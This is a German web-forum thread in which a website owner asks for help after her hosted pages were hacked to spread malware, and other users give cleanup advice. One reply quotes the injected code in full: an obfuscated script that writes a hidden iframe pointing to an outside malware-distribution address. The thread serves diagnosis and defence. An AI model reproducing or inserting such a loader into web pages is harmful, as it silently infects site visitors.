adsense Rauschmiss - meine Webseiten gehackt - verbreiten jetzt malware

Barbara-2

New Member
Thema: adsense Rausschmiss- meine Webseite wurde gehackt - verbreitet jetzt malware

Hallo,

gestern Abend erhielt ich die Nachricht das adsense meinen account ersteinmal deaktiviert hat, weil von meiner Webseite malware ausginge.

Heute morgen ging eine Email ein, das Google vor meiner Webseite warnen würde mit der Vorschaltung einer Webseite bevor meine Seite geöffnet wird, der darauf hinweist das von meiner Seite Schaden ausgehen könne.

Na toll, sehr mistig.

Ich persönlich kann nichts auf der betreffenden Seite sehen, aber wenn ich mit dem Browser flock die betroffene Webseite öffne, sehe ich das unten beim Öffnen 2 mir unbekannte com Domainnamen mit angezeigt werden.

Bei Überprüfung der Domainnamen erfuhr ich über Whois, das der Besitzer der genannten Domains in Kiev, in der Ukraine wohnt....

Das macht mir jetzt schon ein paar Sorgen.

Das Ganze habe ich Strato mitgeteilt. Dort meinte man eben nach Überprüfung das Ganze sei nicht so schlimm, sonst hätte man meine Webseite leider vom Netz nehmen müssen, aber ich solle doch mal jemand mit IT Security Erfahrung bitten das Problem abzustellen. Und das vermutlich mehr Seiten auf meinem Strato Space betroffen wären...

Nach Überprüfung einiger Webseiten auf demselben WebSpace muß ich sagen, ja, der seltsame Code ist auf mehreren Webseiten zu finden.

Habe wieder bei Strato angerufen und nachfgefragt ob ich den Code nicht einfach entfernen könne, dann wäre doch alles o.k.

Man meinte ich könne versuchen den Code selbst zu löschen, der würde dann aber erfahrungsgemäß wieder recht fix von den Übeltätern in die Seite eingefügt. Ich solle daher lieber bitte jemand finden der mein Problem langfristig löst.

Daher meine Frage: was tue ich jetzt am besten ? Denn ich habe nicht viel Ahnung von Webseiten, geschweige denn Netzsicherheit und kann mich eben so durch Go-Life zum Webseiten basteln klicken. Und die nette Frau die mit Css an manchen meiner Webseiten gearbeitet hat, hat auch keine Ahnung was Security angeht und weis auch keinen Rat.

Ergänzend zum Thema kann ich noch sagen das ich vermute das auch mit meinem Rechner etwas nicht stimmt, denn mein Schatz hat vor einiger Zeit große Datenmengen auf unserem Rechner gelöscht, Buchstaben und Zahlengewirr, bei dem wir uns gefragt haben was das bitte ist. Er tippte auf irgendwelche kodierten Daten, die Jemand auf unserer Festplatte geparkt hat.

Ausserdem erleben wir es immer wieder einmal, dass uns nette Menschen anmailen, das wir Ihnen Spam zugesandt hätten, was wir gar nicht getan haben. Sprich: Jemand versendet in unserem Domainnamen Spam.

Ausserdem bin ich heute morgen auf eine weitere Problemmöglichkeit aufmerksam geworden: Eine Kollegin die in derselben Branche tätig ist klagte darüber das Ihr Webspace laut Ihres Providers in den letzten Wochen
häufiges Ziel von Attacken gewesen sei, so daß Sie nun zu einem großen Provider...Strato...(auweia..) gewechselt ist, um mehr Sicherheit zu haben.

Die Webseiten einer anderen Kollegin die sonst immer vorn bei Google standen, waren auch in den letzten 2 - 3 Wochen nicht mehr bei Google zu finden. Wir haben dann gerätselt ob wir es hier mit der "Vertreibe deine Mitbewerber aus Google" Methode zu tun haben, bei der Webseiten von Mitbewerbern mit Malware infiziert werden, damit Sie aus von Google entfernt oder herabgestuft werden.

Und ehe ich jetzt weiter mutmaße, sagte mir gerade meine Wahrsagekugel, daß ich besser Leute frage, die sich mit solchen Themen auskennen.

Also sagt was, ich bin ganz Ohr :-)
Wie stelle ich mein Problem langfristig ab ?

Hier eine meiner Beispielproblemseiten: ---------------------.de (habe hier mal die echte Seite stehen gehabt)

Liebe Grüße,
Barbara-2
 
Last edited by a moderator:
Hallo!
Diesen Teil:
HTML:
<body bgcolor="black" text="white" link="white" vlink="white" alink="white"><!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->
<div align="center">
finde ich ja sehr interessant.
 
Alle Passworte ändern.

2. Schritt, de lokalen Rechner auf Vieren würmer und co prüfen. dieses Vorzugsweise über eine bootfähige Knoppix CD oder einem entsprechenden Derivat.

Nach dem neuen aufsetzen des Client Rechners unbedingt einen virenschutz einsetzen.
Die Quellen lokal auf ebensolche Inhalte prüfen. Wenn diese dort auch vorhanden sind, ist es ein Indiz für ein lokale Vieren Problem.
 
Hallo,

der würde dann aber erfahrungsgemäß wieder recht fix von den Übeltätern in die Seite eingefügt.
das hängt davon ab, wie er reingekommen ist. Sind das rein statische Seiten (also ohne Dateien mit den Endungen php oder pl oder cgi)?

Dann kann es nur an Deinem verseuchten PC liegen, daß über diesen die Zugangsdaten erschnüffelt wurden. An einen sicher sauberen PC setzen, bei Strato alle Passwörter ändern. Danach die Homepages komplett löschen und neu hochladen wäre die beste Lösung, aber vermutlich reicht es auch aus, wenn Du die Hackerscriptzeilen rausnimmst. Mußt Du aber alle Seiten durchsuchen ob eine drin ist. (Das Script versucht von einem anderen Server in einen Iframe "irgendwas" zu laden, was letztlich zu einer Verseuchung des BesucherPCs führt. Funktioniert vermutlich nur für Besucher die den InternetExplorer verwenden).

Die neuen Passwörter auf Deinem PC erst wieder verwenden, wenn der zuverlässig gesäubert wurde. Die einzig wirklich zuverlässige Methode ist eine komplette Neuinstallation.
Jemand versendet in unserem Domainnamen Spam.
Das kann viel bedeuten oder ganz wenig, Spammer verwenden oft irgendeine Domain als Absenderdomain und der eigene PC und Webspace sind an der Aktion überhaupt nicht beteiligt. Zur Analyse würde man eine solche Spammail komplett incl. der Header benötigen.
daß Sie nun zu einem großen Provider...Strato...(auweia..) gewechselt ist, um mehr Sicherheit zu haben.
Strato ist mit sehr großer Wahrscheinlichkeit an dem Problem völlig unschuldig.
Wie stelle ich mein Problem langfristig ab?
Vor allem die PCs sauber halten.
 
vielen Dank für die Tips

Hallo,

und vielen Dank für die Tips. Mein Schatz hat jetzt ersteinmal eine Entseuchungsaktion für den PC gestartet, und ist mit diverse Virenprogrammen auf Trojanerjagd gegangen.

Und auch fündig geworden.

Jetzt hoffen wir, dass das o.k war und und unser Rechner wieder gesund ist, denn wir haben nicht alles neu aufgespielt. (Oh, süße Faulheit..;-)

Danach haben wir neue Strato Passwörter eingerichtet, und die Indexseiten unserer Webseiten neu aufgespielt.

Jetzt hoffen wir erst einmal, das wir nicht in ein paar Stunden oder Tagen wieder Malware-verseuchte Webseiten haben. Seufz...

Und zu den Webseiten: Manche funktionieren über css, die hat die Webdesignerin eingestellt, - und manche funktionierten nur über das html von Golive, das waren mein Schatz und ich. - Aber von CGI, PHP oder ähnlichem verstehen wir glaube ich alle nichts, deshalb gehe ich einmal davon aus, das wir statische Webseiten haben....Obwohl es einen Ordner mit dem Namen CGI auf meinem Webspace gibt.

In Sachen Spammail: Da hoffe ich auch einmal, dass da nur irgendwelcher meinen Domainnamen kurz mißbraucht hat, und der Spuk wieder für lange Zeit vorbei ist.

Vielen Dank noch einmal und drückt mir die Daumen, dass die Webseiten jetzt ersteinmal o.k. bleiben :-)

Liebe Grüße,
Barbara-2
 
Hallo,

von CGI, PHP oder ähnlichem verstehen wir glaube ich alle nichts
muß man nicht, es gibt genug Fertiges als Freeware. Counter, Gästebücher, Mailformulare, Foren, "Bilderbücher" und noch vieles andere.

Wenn aber alle Seiten selbst erstellt sind und keiner scripten kann, dann sind wohl wirklich keine Scripts im Einsatz. Dann ist es sehr unwahrscheinlich, daß der Webspace anders gehackt wurde als über Ausspionieren von Passwörtern.

Ich hoffe, ihr verwendet sichere Paßwörter - die erkennt man vereinfacht gesagt daran, daß man sie sich schlecht merken kann. (Am besten wirren Zeichensalat incl. mindestens eine Ziffer und ein Sonderzeichen, sinnvolle Länge ist 8 Zeichen.)

Obwohl es einen Ordner mit dem Namen CGI auf meinem Webspace gibt.
cgi-bin - oder heißt der wirklich cgi? Vermutlich vom Webhoster, ist üblich wenn der Webspace cgi unterstützt.
drückt mir die Daumen, dass die Webseiten jetzt ersteinmal o.k. bleiben
Einen drück ich Dir, wenn ihr die PC s neu aufsetzt auch den zweiten. :D
 
@chris1407: Fehlen dem Impressum nicht nen paar Angaben? Ustid z.B.?

Nach fast 1 Jahr?
Das kann doch nur Werbung sein!

Ist das denn hier erlaubt?
Hoffentlich nicht. Wenn doch, öffne ich auch so ne Seite, hab ja nen Programm des des alles erledigen kann :)
 
Hallo!
Der Beitrag wurde entfernt und der Benutzeraccount gesperrt.

mfG
Thorsten
 
Back
Top